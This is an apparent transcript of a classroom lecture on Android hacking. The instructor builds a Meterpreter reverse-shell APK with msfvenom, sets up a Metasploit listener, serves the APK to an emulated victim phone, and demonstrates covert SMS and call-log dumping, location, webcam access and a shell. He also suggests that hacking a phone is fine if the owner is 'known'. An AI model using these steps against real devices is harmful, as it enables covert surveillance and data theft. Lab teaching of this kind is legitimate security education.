going to start with the mobile application testing, but we need two virtualizations. First, we need Genymotion over here, which running an Android application, and we need our Kali Linux.
Okay, sir.
So the major perspective of this mobile application testing is to know about the security of the mobile applications and their security features. For example, if you see over here on the notepad, I have written some what is a mobile hacking. So let's talk about nowadays and the modern days. Most of the peoples in our generation, they use smartphones, but there was a time that lots of people, they use keypad phones and some mobile device or some Symbian phones. Day by day, the resolution has been changed. So over here, the main objective of mobile application is just like a phone, which is a practice of manipulating or gaining unauthorized access to a mobile phones, such as intercepting the telecom calls or accessing voice messages. So intercepting the telephone calls mean we can simply read the sniffing part. In mobile application, we can also use the sniffing part to read the or analyze the callings between the two clients. So in this mobile application, they have something said like, can someone hack your cell phone? Is it possible? So the answer will be yes, but the person should be known. Sure, someone can hack your phone and read your text messages from his phone, but the person using the cell phone must not be a stranger to you. No one is allowed to trace or track or monitor someone else's text messages. Using cell phone tracking application is the most well-known method of hacking someone's smartphone. So there are many ways that you can hack someone's cell phones, but the main objective is to simply penetrate your mobile application testing part. So over here, can a mobile number can be hacked? A mobile number can be hacked. Over here, you will see all hackers need your cell phone number. A hacker can hack your phone with your phone number in many different ways. Hacker can send your spam via your text. If a hacker gets into SS7, SS7 is one of the best device for snooping part or spoofing part. Then it will be very easy to track the incoming outgoing conversation. So SS7 is just like your MITM attack, but it's basically used for spoofing attack. It will pretend to be a tower between the two clients, but it will be a hoax. So in this scenario, the most important part we're going to learn today is how a mobile application can be hacked with the help of Metasploit. We're going to use Metasploit to create a malware in our system, and we're going to use that malware for more practicing. So if you see over here, Metasploit framework, the Metasploit project is best known for creation of a software platform for developing, testing, and executing exploit. It can be used to create security testing tools and exploit modules as a pen tester testing system. So we know about the what is auxiliary modules, what is called Metasploit, what is called MSF encode. Auxiliaries are basically your scanners, vulnerability scanners. You can see over here a quick vulnerability scanner to identify the code scanners and your any of the services which is running on the back end of the specific server. So the most important part, you can see a Metasploit, it's just a delivery of exploit. We have worked about the Metasploit, and Metasploit has many other features to be helped in our daily circumstance. It's a scanner, it's an exploit writer, and it can perform lots of things. MSF encode is basically used to create a payload or a malicious piece of code to be executed, or shell codes. You can see is another great tool like in the framework arsenal. When it comes to development, most of the time one can simply use shell code generated straight off the MSF payload. So over here you can see it can be useful for an entire network, and I have given some notes over here with the hacking tutorials of Metasploit. You can simply visit on this one.
Okay, sir.
So, the basic Metasploit commands. or you can visit the OffSec website, MSF Encode, and you can see lots of other things that you can learn from here.
OSCP.
So MSF Encode is another great tool in framework. You can see it for encoding part, and you can see all the examples over here. MSF Payload, MSF Venom. There are lots of things you can use it. So our main objective of this class is we're gonna create a malware. We're gonna create a malware with MSF Metasploit and MSF Venom, and we're gonna use it Metasploit for receiver mode. So over here you can see a metapredator also. What is a metapredator? Metapredator is an advanced dynamically extensible payload that uses in memory DLL injection. A DLL injection, which is an important part, and it communicates over the stages sockets and provides a commensive client-side Ruby API. A payload or piece of code executed through a said exploit. So our main objective will be to create a payload with the help of Metasploit. For example, let me show you. So this will be our victim. So the victim should be our known person as per the data. So we're gonna use Metasploit over here. So I'm gonna run Metasploit. So we have Metasploit is running over here, and we're gonna use MSF Venom.
Okay, sir.
So, and I think we have used MSF Venom in last malware and threats part.
Yes, sir.
So in MSF Venom, we're gonna use -f format. And remember one thing, in the mobile application part, if you want to create a malware to the mobile application, it will run an APK file. You can see ASP, AXPX, EXE, jar file, PSP, push file, var file, and you will see some bash, C bash, drop, raw, VBS script.
Yes, sir.
But over here, the main objective of our mobile hacking is to make a APK file. So we're gonna use -f list format, and I'm gonna use the payload type also.
Okay, sir.
So we're gonna use -f list payload. But over here, I'm gonna use a pipe command to grab a file called Android over there, and hit enter. And we can see in the MSF Venom payload, there are around Android. You can see Android metapredator, reverse HTTP, reverse HTTPS, reverse TCP, reverse underscore TCP, Metasploit reverse HTTPS. See, there are lots of things. But we're gonna use the sufficient one. Why? Because we want to get a reverse shell from the victim side when the victim execute our payload. So that will be our reverse shell, and we're gonna use this one. Run a metadata server in Android. Connect back to the stage. Means you're connected. So what I'm going to do, I'm going to copy this one, and we're going to create a MSF Venom payload. So MSF Venom -p represent the payload type. Android metapredator reverse TCP, and we're going to use an host. Host means attacker IP address. So my attacker IP address is 108. So 192.168.0.108. port, the listening port. Remember one thing, when you are activating a listener port in your server, it should be not in busy, means it should be free in your local host. So
Okay, sir.
this is on the local environment, so we can use any of the tools. For example, I'm going to use 4448, a random port number, and we're going to use capital X. Capital X is basically used to, if it doesn't know the architecture, it will use to make a format, specifying a format. So forward slash, we're going to use root desktop, and we're going to name this anything. Let's do shell.apk. So remember one thing, the APK extension is basically used when a mobile application can be installed. So if I hit enter, we had created a payload, which is this bytes. And if I see over here, I can see the shell.apk file is there. So if I simply, okay, let's use file and shell. So you can see it's zip archive data. So this should be extract on the server side of the attacker. So when we are placing this application, when we are sending this application to the victim side, we have to activate our listener also.
Okay, sir.
For that case, what I'm going to do, we're going to use Metasploit for that. To activate the listener mode in Metasploit, you have to use exploit slash multi handler, which is a multiple connection.
Okay,
This
sir.
is basically used for multiple extension or the multiple handler to receive the connection from various issues. So set payload, the payload which you use in your Metasploit creation part. So we're going to use this one. Now the show options for the receivers to configure. So we're going to use to configure the two ports, which is your L host and L port over here. So we're going to use set L host, the attacker IP address, which is our 108, and the set L port for the listener port, we're going to use 4448 as per the same as well as over here, because
Okay.
it should be on the same network. Cross verification, and we can see over here that the L host, which is an attacker IP address, and L port, which is an attacker listening port on this network, has been set over here on the Metasploit. So we're going to do is exploit, and if we cross verification, you can use netstack to identify if the port is active or not. So over here we can see the port is been activated 44448. So the main objective now is to send this file to the victim side, which is over here. So I already have this. So we have a payload over here already installed in the server. So this was a small payload which I created
Okay, sir.
very time ago. So we have to send this payload to this server. So this is a demonstration. So I'm going to send this payload on my exploit directory. So over here, let's share it over here, and we're going to use a Python server to share the file. So I'm going to use Python -m simple HTTP server and default port on 8000. So we can see that our 8000 port has been activated. So what we're going to do, we're going to go to the browser. We're going to go to his browser over here, and Over here, it's already have an IP address, so we're gonna change it to 8. We get 4008. So if you see over here, we can see the files. So we're gonna download the shell.apk file. See, the download has been started. The main objective when you allow an application to be installed in your local environment or your local server, remember to read the features which will take the privacy part. The privacy part are the important part. Why? Because if I'm not seeing the privacy part, it will have some access, like it can directly call my number. It will cost you money. It will read your text or receive your text and send your text. It will cost you money. Take pictures and videos, record audios, approximate locations, modify your contact, read logs, contacts, write and like call, modify or delete the content of your SD card. See, it will take all the details. It will get all the permissions over here. Whenever you install an application in your local environment, remember one thing: never to get any of the security features that can access. But if we install that one, and I have a listener over here. I have a listener over here. So if he clicks and open that one, I will have a Metasploit session from that specific one. And through that thing, I can do a lots of things from here. See, how does it work? When we have a Metasploit session, all you can do is question mark, and you will see the allowable application payloads types. Application control commands: apt install, apt list, apt run, apt uninstall. Android commands like activity starts, check root, is the server is the host is rooted or not, the device is rooted. So it's the most vulnerable thing. You can dump the SMSs if they have some SMSs on the system. No message will be found. Geolocation, we can find the geolocation if they activated their uh, location string. If you see over here, you can access the web stream, or you can snap the web cam also. So if I do this one, see, you will not know anything that it can do lots of things and damage on you. A webcam list, a webcam record also can be done. See over here, if I do simple this one, so this can be happened, and the victim is not aware of this thing. He is not aware of anything that his phone is even activated or not. He's just working over here in the back end. He's just doing his work. That's it. But in the back end, there could be lots of things can be happen. You can dump the calls, get all the call logs from the system. If you use this one, you will dump all the call logs. But there was no call entries were found. Webcam streaming, audio played, webcam commands, get a screenshot, screen share. You can use this one. You can see all the activities which he's doing right now. This might be have some issues with it. You can use screenshot. Okay, we are not allowed to have a screenshot with it. We can do system info, or we can do PS, which are the applications running in the back end of that. We can execute any command from here, and we can go to that system shell. If you write shell over here, if you type shell, you will get a system shell over here. If I do ifconfig, again it will not work. So if you do ls -all, let's do ls, I guess. Okay. See, you can run all the Linux command because Android is also a Linux application, Linux architecture. You can see all the devices over here. You can see the SD card, or you can move to any of the devices. The main objective of your mobile hacking is simply what the things he's not aware about. They are not aware about which application is accessing their data. But in the real life scenario, the mobile application testing is totally different because they are also learning of OWASP top 10. If you look on the google.com for more mobile application testing, mobile OWASP top 10. There are also top 10 critical vulnerabilities of your mobile architecture. At that time, you should know about the code reading, the code analysis. See, these are the top 10 critical vulnerabilities of your mobile application when you go enroll for the mobile PT. And from that, on that time, you're going to learn all these things one by one. Improper platform uses, insecure data storage, insecure communication, insecure authentication, insufficient cryptography, insecure authorization, poor code quality, code tampering, reverse engineering, and extraneous functionality. And these are the top 10 critical vulnerabilities which are used basically for pen testing part. So our main objective will be to penetrate or to hack or to test the servers. So in the real life scenario, you will learn about this part of things, and this was like simply code. You can do lots of things on the server side when you get access. You can simply read any of the content. It's if using SD card, if he's using any of the things. But before that, you have to understand the architecture of the mobile application part. And you can try lots of things in the Metasploit also. You can cat, cd, checksum, dir, edit, gitlog, mkdir, make directory, remove directory, upload a file, search a files. There's a lot of things you can perform over here. Is it clear?
Yes, sir.
Vigesh?
Yes, sir.
This was all about the mobile application hacking and the security features. Thank you.